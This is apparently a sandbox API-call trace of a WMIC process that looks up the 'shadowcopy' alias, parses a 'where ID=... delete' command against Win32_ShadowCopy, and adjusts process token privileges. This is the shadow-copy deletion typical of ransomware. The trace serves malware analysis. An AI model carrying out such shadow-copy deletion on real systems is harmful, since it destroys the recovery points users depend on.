[0123.066] malloc (_Size=0x18) returned 0x56cba0 [0123.067] malloc (_Size=0x18) returned 0x56cbc0 [0123.067] SysStringLen (param_1="root\\cli") returned 0x8 [0123.067] SysStringLen (param_1="\\") returned 0x1 [0123.067] malloc (_Size=0x18) returned 0x56cbe0 [0123.067] SysStringLen (param_1="root\\cli\\") returned 0x9 [0123.067] SysStringLen (param_1="ms_409") returned 0x6 [0123.067] free (_Block=0x56cbc0) [0123.067] free (_Block=0x56cba0) [0123.067] free (_Block=0x56cb80) [0123.067] free (_Block=0x56cae0) [0123.067] malloc (_Size=0x18) returned 0x56cae0 [0123.067] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1f71390, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff8f29a0 | out: ppNamespace=0xff8f29a0*=0x1f83b28) returned 0x0 [0123.071] free (_Block=0x56cae0) [0123.072] free (_Block=0x56cbe0) [0123.072] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0123.072] GetCurrentThreadId () returned 0xaa8 [0123.072] ??0CHString@@QEAA@XZ () returned 0x22f9b0 [0123.072] malloc (_Size=0x18) returned 0x56cbe0 [0123.072] malloc (_Size=0x18) returned 0x56cae0 [0123.072] malloc (_Size=0x18) returned 0x56cb80 [0123.072] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0123.072] malloc (_Size=0x3a) returned 0x56cfa0 [0123.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff881980, cbMultiByte=-1, lpWideCharStr=0x56cfa0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0123.072] free (_Block=0x56cfa0) [0123.072] malloc (_Size=0x18) returned 0x56cba0 [0123.072] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0123.072] SysStringLen (param_1="shadowcopy") returned 0xa [0123.072] malloc (_Size=0x18) returned 0x56cbc0 [0123.072] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0123.072] SysStringLen (param_1="'") returned 0x1 [0123.073] free (_Block=0x56cba0) [0123.073] free (_Block=0x56cb80) [0123.073] free (_Block=0x56cae0) [0123.073] free (_Block=0x56cbe0) [0123.073] IWbemServices:GetObject (in: This=0x1f83a98, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x22f9b8*=0x0, ppCallResult=0x0 | out: ppObject=0x22f9b8*=0x1f904e0, ppCallResult=0x0) returned 0x0 [0123.079] malloc (_Size=0x18) returned 0x56cbe0 [0123.079] IWbemClassObject:Get (in: This=0x1f904e0, wszName="Target", lFlags=0, pVal=0x22f8e0*(varType=0x0, wReserved1=0xff8f, wReserved2=0x0, wReserved3=0x0, varVal1=0xff8f2998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x22f8e0*(varType=0x8, wReserved1=0xff8f, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0123.079] free (_Block=0x56cbe0) [0123.079] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0123.079] malloc (_Size=0x3e) returned 0x56cfa0 [0123.079] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0123.079] malloc (_Size=0x18) returned 0x56cbe0 [0123.079] IWbemClassObject:Get (in: This=0x1f904e0, wszName="PWhere", lFlags=0, pVal=0x22f8e0*(varType=0x0, wReserved1=0xff8f, wReserved2=0x0, wReserved3=0x0, varVal1=0x35e298, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x22f8e0*(varType=0x8, wReserved1=0xff8f, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0123.079] free (_Block=0x56cbe0) [0123.079] lstrlenW (lpString=" Where ID = '#'") returned 15 [0123.079] malloc (_Size=0x20) returned 0x56cff0 [0123.079] lstrlenW (lpString=" Where ID = '#'") returned 15 [0123.079] malloc (_Size=0x18) returned 0x56cbe0 [0123.080] IWbemClassObject:Get (in: This=0x1f904e0, wszName="Connection", lFlags=0, pVal=0x22f8e0*(varType=0x0, wReserved1=0xff8f, wReserved2=0x0, wReserved3=0x0, varVal1=0x3abd68, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x22f8e0*(varType=0xd, wReserved1=0xff8f, wReserved2=0x0, wReserved3=0x0, varVal1=0x1f909c0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0123.080] free (_Block=0x56cbe0) [0123.080] IUnknown:QueryInterface (in: This=0x1f909c0, riid=0xff887360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x22f8d0 | out: ppvObject=0x22f8d0*=0x1f909c0) returned 0x0 [0123.080] GetCurrentThreadId () returned 0xaa8 [0123.080] ??0CHString@@QEAA@XZ () returned 0x22f7f8 [0123.080] malloc (_Size=0x18) returned 0x56cbe0 [0123.080] IWbemClassObject:Get (in: This=0x1f909c0, wszName="Namespace", lFlags=0, pVal=0x22f820*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff89738f, varVal2=0x56cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x22f820*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x56cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0123.080] free (_Block=0x56cbe0) [0123.080] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0123.080] malloc (_Size=0x16) returned 0x56cbe0 [0123.080] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0123.080] malloc (_Size=0x18) returned 0x56cae0 [0123.080] IWbemClassObject:Get (in: This=0x1f909c0, wszName="Locale", lFlags=0, pVal=0x22f820*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3da658, varVal2=0x56cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x22f820*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x56cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0123.080] free (_Block=0x56cae0) [0123.080] lstrlenW (lpString="ms_409") returned 6 [0123.080] malloc (_Size=0xe) returned 0x56cae0 [0123.081] lstrlenW (lpString="ms_409") returned 6 [0123.081] malloc (_Size=0x18) returned 0x56cb80 [0123.081] IWbemClassObject:Get (in: This=0x1f909c0, wszName="User", lFlags=0, pVal=0x22f820*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3da658, varVal2=0x56cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x22f820*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3da658, varVal2=0x56cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0123.081] free (_Block=0x56cb80) [0123.081] malloc (_Size=0x18) returned 0x56cb80 [0123.081] IWbemClassObject:Get (in: This=0x1f909c0, wszName="Password", lFlags=0, pVal=0x22f820*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3da658, varVal2=0x56cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x22f820*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3da658, varVal2=0x56cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0123.081] free (_Block=0x56cb80) [0123.081] malloc (_Size=0x18) returned 0x56cb80 [0123.081] IWbemClassObject:Get (in: This=0x1f909c0, wszName="Server", lFlags=0, pVal=0x22f820*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3da658, varVal2=0x56cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x22f820*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x56cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0123.081] free (_Block=0x56cb80) [0123.081] lstrlenW (lpString=".") returned 1 [0123.081] malloc (_Size=0x4) returned 0x567140 [0123.081] lstrlenW (lpString=".") returned 1 [0123.081] malloc (_Size=0x18) returned 0x56cb80 [0123.081] IWbemClassObject:Get (in: This=0x1f909c0, wszName="Authority", lFlags=0, pVal=0x22f820*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3da658, varVal2=0x56cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x22f820*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3da658, varVal2=0x56cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0123.081] free (_Block=0x56cb80) [0123.081] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0123.081] IUnknown:Release (This=0x1f909c0) returned 0x1 [0123.082] GetCurrentThreadId () returned 0xaa8 [0123.082] ??0CHString@@QEAA@XZ () returned 0x22f7f8 [0123.082] malloc (_Size=0x18) returned 0x56cb80 [0123.082] IWbemClassObject:Get (in: This=0x1f904e0, wszName="__RELPATH", lFlags=0, pVal=0x22f820*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3da658, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0x22f820*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0 [0123.082] free (_Block=0x56cb80) [0123.082] malloc (_Size=0x18) returned 0x56cb80 [0123.082] GetCurrentThreadId () returned 0xaa8 [0123.082] ??0CHString@@QEAA@XZ () returned 0x22f678 [0123.082] ??0CHString@@QEAA@PEBG@Z () returned 0x22f690 [0123.082] ??0CHString@@QEAA@AEBV0@@Z () returned 0x22f620 [0123.082] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0123.082] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x56d020 [0123.082] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0123.082] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x22f5e0 [0123.082] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x22f628 [0123.083] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x22f690 [0123.083] ??1CHString@@QEAA@XZ () returned 0x4edfd601 [0123.083] ??1CHString@@QEAA@XZ () returned 0x4edfd601 [0123.083] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x22f5e8 [0123.083] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x22f620 [0123.083] ??1CHString@@QEAA@XZ () returned 0x1 [0123.083] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x56d090 [0123.083] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa [0123.083] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x22f5e0 [0123.083] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x22f628 [0123.083] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x22f690 [0123.083] ??1CHString@@QEAA@XZ () returned 0x4edfd601 [0123.083] ??1CHString@@QEAA@XZ () returned 0x4edfd601 [0123.083] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x22f5e8 [0123.083] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x22f620 [0123.083] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0123.083] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef4af4820 [0123.083] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0123.083] malloc (_Size=0x18) returned 0x56cba0 [0123.083] malloc (_Size=0x18) returned 0x56cc00 [0123.083] malloc (_Size=0x18) returned 0x56cc20 [0123.083] malloc (_Size=0x18) returned 0x56cc40 [0123.083] malloc (_Size=0x18) returned 0x56cc60 [0123.083] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0123.083] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0123.084] malloc (_Size=0x18) returned 0x56cc80 [0123.084] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0123.084] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0123.084] malloc (_Size=0x18) returned 0x56cca0 [0123.084] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0123.084] SysStringLen (param_1="\"") returned 0x1 [0123.084] free (_Block=0x56cc80) [0123.084] free (_Block=0x56cc60) [0123.084] free (_Block=0x56cc40) [0123.084] free (_Block=0x56cc20) [0123.084] free (_Block=0x56cc00) [0123.084] free (_Block=0x56cba0) [0123.084] IWbemServices:GetObject (in: This=0x1f83b28, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x22f668*=0x0, ppCallResult=0x0 | out: ppObject=0x22f668*=0x1f90a50, ppCallResult=0x0) returned 0x0 [0123.086] malloc (_Size=0x18) returned 0x56cba0 [0123.086] IWbemClassObject:Get (in: This=0x1f90a50, wszName="Text", lFlags=0, pVal=0x22f6a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff8f2ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0x22f6a0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3d4ab0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x35e030, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0 [0123.086] free (_Block=0x56cba0) [0123.086] SafeArrayGetLBound (in: psa=0x3d4ab0, nDim=0x1, plLbound=0x22f680 | out: plLbound=0x22f680) returned 0x0 [0123.086] SafeArrayGetUBound (in: psa=0x3d4ab0, nDim=0x1, plUbound=0x22f670 | out: plUbound=0x22f670) returned 0x0 [0123.086] SafeArrayGetElement (in: psa=0x3d4ab0, rgIndices=0x22f664, pv=0x22f6b8 | out: pv=0x22f6b8) returned 0x0 [0123.086] malloc (_Size=0x18) returned 0x56cba0 [0123.086] malloc (_Size=0x18) returned 0x56cc00 [0123.086] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0123.086] free (_Block=0x56cba0) [0123.086] IUnknown:Release (This=0x1f90a50) returned 0x0 [0123.086] free (_Block=0x56cca0) [0123.086] ??1CHString@@QEAA@XZ () returned 0x4edfd601 [0123.086] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0123.087] free (_Block=0x56cb80) [0123.087] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0123.087] lstrlenW (lpString="Shadow copy management.") returned 23 [0123.087] malloc (_Size=0x30) returned 0x5685c0 [0123.087] lstrlenW (lpString="Shadow copy management.") returned 23 [0123.087] free (_Block=0x56cc00) [0123.087] IUnknown:Release (This=0x1f904e0) returned 0x0 [0123.087] free (_Block=0x56cbc0) [0123.087] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0123.087] lstrlenW (lpString="PATH") returned 4 [0123.087] lstrlenW (lpString="where") returned 5 [0123.087] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0123.087] lstrlenW (lpString="WHERE") returned 5 [0123.087] lstrlenW (lpString="where") returned 5 [0123.087] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0123.087] lstrlenW (lpString="/") returned 1 [0123.087] lstrlenW (lpString="ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'") returned 43 [0123.087] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'", cchCount1=43, lpString2="/", cchCount2=1) returned 3 [0123.087] lstrlenW (lpString="-") returned 1 [0123.087] lstrlenW (lpString="ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'") returned 43 [0123.087] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'", cchCount1=43, lpString2="-", cchCount2=1) returned 3 [0123.087] lstrlenW (lpString="ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'") returned 43 [0123.087] malloc (_Size=0x58) returned 0x56d020 [0123.088] lstrlenW (lpString="ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'") returned 43 [0123.088] lstrlenW (lpString="/") returned 1 [0123.088] lstrlenW (lpString="delete") returned 6 [0123.088] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0123.088] lstrlenW (lpString="-") returned 1 [0123.088] lstrlenW (lpString="delete") returned 6 [0123.088] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0123.088] lstrlenW (lpString="delete") returned 6 [0123.088] malloc (_Size=0xe) returned 0x56cbc0 [0123.088] lstrlenW (lpString="delete") returned 6 [0123.088] lstrlenW (lpString="GET") returned 3 [0123.088] lstrlenW (lpString="delete") returned 6 [0123.088] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0123.088] lstrlenW (lpString="LIST") returned 4 [0123.088] lstrlenW (lpString="delete") returned 6 [0123.088] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0123.088] lstrlenW (lpString="SET") returned 3 [0123.088] lstrlenW (lpString="delete") returned 6 [0123.088] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0123.088] lstrlenW (lpString="CREATE") returned 6 [0123.088] lstrlenW (lpString="delete") returned 6 [0123.088] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0123.088] lstrlenW (lpString="CALL") returned 4 [0123.088] lstrlenW (lpString="delete") returned 6 [0123.088] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0123.088] lstrlenW (lpString="ASSOC") returned 5 [0123.089] lstrlenW (lpString="delete") returned 6 [0123.089] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0123.089] lstrlenW (lpString="DELETE") returned 6 [0123.089] lstrlenW (lpString="delete") returned 6 [0123.089] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0123.089] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0123.089] malloc (_Size=0x3e) returned 0x56d080 [0123.089] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0123.089] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0123.089] malloc (_Size=0x18) returned 0x56cc00 [0123.089] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*" [0123.089] lstrlenW (lpString="FROM") returned 4 [0123.089] lstrlenW (lpString="*") returned 1 [0123.089] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0123.089] malloc (_Size=0x18) returned 0x56cb80 [0123.089] free (_Block=0x56cc00) [0123.089] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3b00760009 | out: _String=0x0, _Context=0x3b00760009) returned="from" [0123.089] lstrlenW (lpString="FROM") returned 4 [0123.089] lstrlenW (lpString="from") returned 4 [0123.090] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0123.090] malloc (_Size=0x18) returned 0x56cc00 [0123.090] free (_Block=0x56cb80) [0123.090] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3c00760009 | out: _String=0x0, _Context=0x3c00760009) returned="Win32_ShadowCopy" [0123.090] malloc (_Size=0x18) returned 0x56cb80 [0123.090] free (_Block=0x56cc00) [0123.090] free (_Block=0x56d080) [0123.090] free (_Block=0x56cb80) [0123.090] lstrlenW (lpString="SET") returned 3 [0123.090] lstrlenW (lpString="delete") returned 6 [0123.090] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0123.090] lstrlenW (lpString="CREATE") returned 6 [0123.090] lstrlenW (lpString="delete") returned 6 [0123.091] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0123.091] free (_Block=0x56cef0) [0123.091] malloc (_Size=0x8) returned 0x566f20 [0123.091] lstrlenW (lpString="GET") returned 3 [0123.091] lstrlenW (lpString="delete") returned 6 [0123.091] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0123.091] lstrlenW (lpString="LIST") returned 4 [0123.091] lstrlenW (lpString="delete") returned 6 [0123.091] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0123.091] lstrlenW (lpString="ASSOC") returned 5 [0123.091] lstrlenW (lpString="delete") returned 6 [0123.091] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0123.091] WbemLocator:IUnknown:AddRef (This=0x1f71390) returned 0x3 [0123.091] free (_Block=0x23dfb0) [0123.091] lstrlenW (lpString="") returned 0 [0123.091] lstrlenW (lpString="XDUWTFONO") returned 9 [0123.091] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0123.091] lstrlenW (lpString="XDUWTFONO") returned 9 [0123.092] malloc (_Size=0x14) returned 0x56cb80 [0123.092] lstrlenW (lpString="XDUWTFONO") returned 9 [0123.092] GetCurrentThreadId () returned 0xaa8 [0123.092] GetCurrentProcess () returned 0xffffffffffffffff [0123.092] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x22fa40 | out: TokenHandle=0x22fa40*=0x280) returned 1 [0123.092] GetTokenInformation (in: TokenHandle=0x280, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x22fa38 | out: TokenInformation=0x0, ReturnLength=0x22fa38) returned 0 [0123.092] malloc (_Size=0x118) returned 0x56d080 [0123.092] GetTokenInformation (in: TokenHandle=0x280, TokenInformationClass=0x3, TokenInformation=0x56d080, TokenInformationLength=0x118, ReturnLength=0x22fa38 | out: TokenInformation=0x56d080, ReturnLength=0x22fa38) returned 1 [0123.092] AdjustTokenPrivileges (in: TokenHandle=0x280, DisableAllPrivileges=0, NewState=0x56d080*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=-1344285555, Attributes=0xad8d), (Luid.LowPart=0x0, Luid.HighPart=5689072, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0123.092] free (_Block=0x56d080) [0123.092] CloseHandle (hObject=0x280) returned 1 [0123.092] lstrlenW (lpString="GET") returned 3 [0123.092] lstrlenW (lpString="delete") returned 6 [0123.092] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0123.092] lstrlenW (lpString="LIST") returned 4 [0123.092] lstrlenW (lpString="delete") returned 6 [0123.092] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0123.092] lstrlenW (lpString="SET") returned 3 [0123.092] lstrlenW (lpString="delete") returned 6 [0123.093] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0123.093] lstrlenW (lpString="CALL") returned 4 [0123.093] lstrlenW (lpString="delete") returned 6 [0123.093] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0123.093] lstrlenW (lpString="ASSOC") returned 5 [0123.093] lstrlenW (lpString="delete") returned 6 [0123.093] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0123.093] lstrlenW (lpString="CREATE") returned 6 [0123.093] lstrlenW (lpString="delete") returned 6 [0123.093] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0123.093] lstrlenW (lpString="DELETE") returned 6 [0123.093] lstrlenW (lpString="delete") returned 6 [0123.093] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0123.093] malloc (_Size=0x18) returned 0x56cc00 [0123.093] lstrlenA (lpString="") returned 0 [0123.093] malloc (_Size=0x2) returned 0x23dfb0 [0123.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff88314c, cbMultiByte=-1, lpWideCharStr=0x23dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0123.093] free (_Block=0x23dfb0) [0123.093] malloc (_Size=0x18) returned 0x56cca0 [0123.094] lstrlenA (lpString="") returned 0 [0123.094] malloc (_Size=0x2) returned 0x23dfb0 [0123.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff88314c, cbMultiByte=-1, lpWideCharStr=0x23dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0123.094] free (_Block=0x23dfb0) [0123.094] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0123.094] malloc (_Size=0x3e) returned 0x56d080 [0123.094] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0123.094] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0123.094] malloc (_Size=0x18) returned 0x56cba0 [0123.094] free (_Block=0x56cca0) [0123.094] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3f006e0007 | out: _String=0x0, _Context=0x3f006e0007) returned="*" [0123.094] lstrlenW (lpString="FROM") returned 4 [0123.094] lstrlenW (lpString="*") returned 1 [0123.094] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0123.094] malloc (_Size=0x18) returned 0x56cca0 [0123.094] free (_Block=0x56cba0) [0123.094] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x40006e0007 | out: _String=0x0, _Context=0x40006e0007) returned="from" [0123.094] lstrlenW 